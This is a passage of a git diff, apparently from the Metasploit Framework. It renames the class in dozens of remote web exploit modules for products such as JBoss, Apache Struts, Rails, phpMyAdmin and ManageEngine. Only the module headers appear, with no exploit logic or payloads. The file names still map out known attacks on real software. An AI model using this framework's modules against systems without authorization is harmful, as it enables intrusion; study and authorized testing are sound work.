-5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 62e005272c..5e8d269d03 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 089886f388..514a6a45b3 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_seam_upload_exec.rb b/modules/exploits/multi/http/jboss_seam_upload_exec.rb index 383835e09e..b8670c6052 100644 --- a/modules/exploits/multi/http/jboss_seam_upload_exec.rb +++ b/modules/exploits/multi/http/jboss_seam_upload_exec.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 4f20bf4241..d825a6f68f 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jira_hipchat_template.rb b/modules/exploits/multi/http/jira_hipchat_template.rb index 076c92d5a0..924d348356 100644 --- a/modules/exploits/multi/http/jira_hipchat_template.rb +++ b/modules/exploits/multi/http/jira_hipchat_template.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb index e1d357316c..3f550c6497 100644 --- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb +++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/lcms_php_exec.rb b/modules/exploits/multi/http/lcms_php_exec.rb index 57645a8eb9..0365b344fc 100644 --- a/modules/exploits/multi/http/lcms_php_exec.rb +++ b/modules/exploits/multi/http/lcms_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb index 1d88c4b603..3e7f142d56 100644 --- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb +++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb index 43d6c35606..71b8f3c04e 100644 --- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb +++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb index 7c3fd644b2..7ea5105ad1 100644 --- a/modules/exploits/multi/http/manageengine_auth_upload.rb +++ b/modules/exploits/multi/http/manageengine_auth_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manageengine_sd_uploader.rb b/modules/exploits/multi/http/manageengine_sd_uploader.rb index e29eaee825..5b8c04f0ce 100644 --- a/modules/exploits/multi/http/manageengine_sd_uploader.rb +++ b/modules/exploits/multi/http/manageengine_sd_uploader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index 0f2db4f784..a16088a0d2 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb index 77f3afb9a1..48523cc5ef 100644 --- a/modules/exploits/multi/http/mantisbt_php_exec.rb +++ b/modules/exploits/multi/http/mantisbt_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mediawiki_thumb.rb b/modules/exploits/multi/http/mediawiki_thumb.rb index bd4f427bc2..be3bcfea1d 100644 --- a/modules/exploits/multi/http/mediawiki_thumb.rb +++ b/modules/exploits/multi/http/mediawiki_thumb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mma_backdoor_upload.rb b/modules/exploits/multi/http/mma_backdoor_upload.rb index 182355330f..55a33c3fe7 100644 --- a/modules/exploits/multi/http/mma_backdoor_upload.rb +++ b/modules/exploits/multi/http/mma_backdoor_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index ec66051290..d58161de13 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index 785620195b..485fc65d39 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index 56b1fc63e2..5d52ed78f7 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/nibbleblog_file_upload.rb b/modules/exploits/multi/http/nibbleblog_file_upload.rb index b211c419cc..a0c53a5fe2 100644 --- a/modules/exploits/multi/http/nibbleblog_file_upload.rb +++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/op5_license.rb b/modules/exploits/multi/http/op5_license.rb index bc58fd7800..885c5052db 100644 --- a/modules/exploits/multi/http/op5_license.rb +++ b/modules/exploits/multi/http/op5_license.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/op5_welcome.rb b/modules/exploits/multi/http/op5_welcome.rb index ec46b9dadf..d46dd09a10 100644 --- a/modules/exploits/multi/http/op5_welcome.rb +++ b/modules/exploits/multi/http/op5_welcome.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index 91d835ebfe..d18396ba80 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty)/ ] } diff --git a/modules/exploits/multi/http/openmediavault_cmd_exec.rb b/modules/exploits/multi/http/openmediavault_cmd_exec.rb index 62ec89d2b2..4be4d81ca7 100644 --- a/modules/exploits/multi/http/openmediavault_cmd_exec.rb +++ b/modules/exploits/multi/http/openmediavault_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/openx_backdoor_php.rb b/modules/exploits/multi/http/openx_backdoor_php.rb index 4767a521d3..1a097fd6bb 100644 --- a/modules/exploits/multi/http/openx_backdoor_php.rb +++ b/modules/exploits/multi/http/openx_backdoor_php.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb index bcc652133b..d9017acff1 100644 --- a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb +++ b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/oracle_reports_rce.rb b/modules/exploits/multi/http/oracle_reports_rce.rb index 1351e8e663..aa96081ab7 100644 --- a/modules/exploits/multi/http/oracle_reports_rce.rb +++ b/modules/exploits/multi/http/oracle_reports_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/http/pandora_upload_exec.rb b/modules/exploits/multi/http/pandora_upload_exec.rb index c49b881aa6..e260323353 100644 --- a/modules/exploits/multi/http/pandora_upload_exec.rb +++ b/modules/exploits/multi/http/pandora_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 852065bceb..5ff2a02952 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index 398cceb77a..56dcda56d7 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpfilemanager_rce.rb b/modules/exploits/multi/http/phpfilemanager_rce.rb index 52c44338af..ee92c2d006 100644 --- a/modules/exploits/multi/http/phpfilemanager_rce.rb +++ b/modules/exploits/multi/http/phpfilemanager_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index e3f61a5c0e..f4a13ff765 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index c59fc93c7b..07e724ebec 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb index ab0eac887e..f08271cfe8 100644 --- a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb +++ b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpscheduleit_start_date.rb b/modules/exploits/multi/http/phpscheduleit_start_date.rb index dc81ac84d2..1cb52422ab 100644 --- a/modules/exploits/multi/http/phpscheduleit_start_date.rb +++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phptax_exec.rb b/modules/exploits/multi/http/phptax_exec.rb index 1ab3ec788a..298234721b 100644 --- a/modules/exploits/multi/http/phptax_exec.rb +++ b/modules/exploits/multi/http/phptax_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb index ee3494bd8d..2eed181293 100644 --- a/modules/exploits/multi/http/phpwiki_ploticus_exec.rb +++ b/modules/exploits/multi/http/phpwiki_ploticus_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/plone_popen2.rb b/modules/exploits/multi/http/plone_popen2.rb index cdd4498235..85ae5364aa 100644 --- a/modules/exploits/multi/http/plone_popen2.rb +++ b/modules/exploits/multi/http/plone_popen2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/pmwiki_pagelist.rb b/modules/exploits/multi/http/pmwiki_pagelist.rb index 4dd9d17ad7..69eaf74d1e 100644 --- a/modules/exploits/multi/http/pmwiki_pagelist.rb +++ b/modules/exploits/multi/http/pmwiki_pagelist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/polarcms_upload_exec.rb b/modules/exploits/multi/http/polarcms_upload_exec.rb index ab07e145f4..ee5adbdc09 100644 --- a/modules/exploits/multi/http/polarcms_upload_exec.rb +++ b/modules/exploits/multi/http/polarcms_upload_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index a125f2f6aa..9a7f37a6ca 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index dc30c86673..ad3841acbc 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index 3024ccd269..a8da7d1553 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index e769d6fe7f..9aa9b8e633 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking #Helper Classes copy/paste from Rails4 diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 482d24fff4..29e4072bd1 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb index 1b68188e23..29d59a6453 100644 --- a/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb +++ b/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb index 7a9c1875b2..bc898098c3 100644 --- a/modules/exploits/multi/http/sflog_upload_exec.rb +++ b/modules/exploits/multi/http/sflog_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/simple_backdoors_exec.rb b/modules/exploits/multi/http/simple_backdoors_exec.rb index 70dd94fedc..4b23877fda 100644 --- a/modules/exploits/multi/http/simple_backdoors_exec.rb +++ b/modules/exploits/multi/http/simple_backdoors_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index 93dbe861a2..f854d6483b 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/snortreport_exec.rb b/modules/exploits/multi/http/snortreport_exec.rb index f9415ea72b..077c327a73 100644 --- a/modules/exploits/multi/http/snortreport_exec.rb +++ b/modules/exploits/multi/http/snortreport_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb index dda8a2679b..c2b3a72a7b 100644 --- a/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb +++ b/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index e4f57ed9d6..c1fd88b671 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index e6ebe8f4f2..c23d9b5a41 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 3cdd8d3d05..20066ea72b 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index 08ca040d92..9c17ad00f3 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index e92b72c426..49b6c061b4 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index a4355a656b..a629668198 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 52417b8de7..479ce0f89f 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # It's going to manipulate the Class Loader include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index f762eab462..83a47cb405 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index 560f26b508..e9e568a9ee 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_default_action_mapper.rb b/modules/exploits/multi/http/struts_default_action_mapper.rb index e05c081e4c..af4acfdf6a 100644 --- a/modules/exploits/multi/http/struts_default_action_mapper.rb +++ b/modules/exploits/multi/http/struts_default_action_mapper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_dev_mode.rb b/modules/exploits/multi/http/struts_dev_mode.rb index 1f31cea9f0..856973c841 100644 --- a/modules/exploits/multi/http/struts_dev_mode.rb +++ b/modules/exploits/multi/http/struts_dev_mode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index e374c630f7..555d03f990 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/stunshell_eval.rb b/modules/exploits/multi/http/stunshell_eval.rb index bba42107fe..6612a08732 100644 --- a/modules/exploits/multi/http/stunshell_eval.rb +++ b/modules/exploits/multi/http/stunshell_eval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < 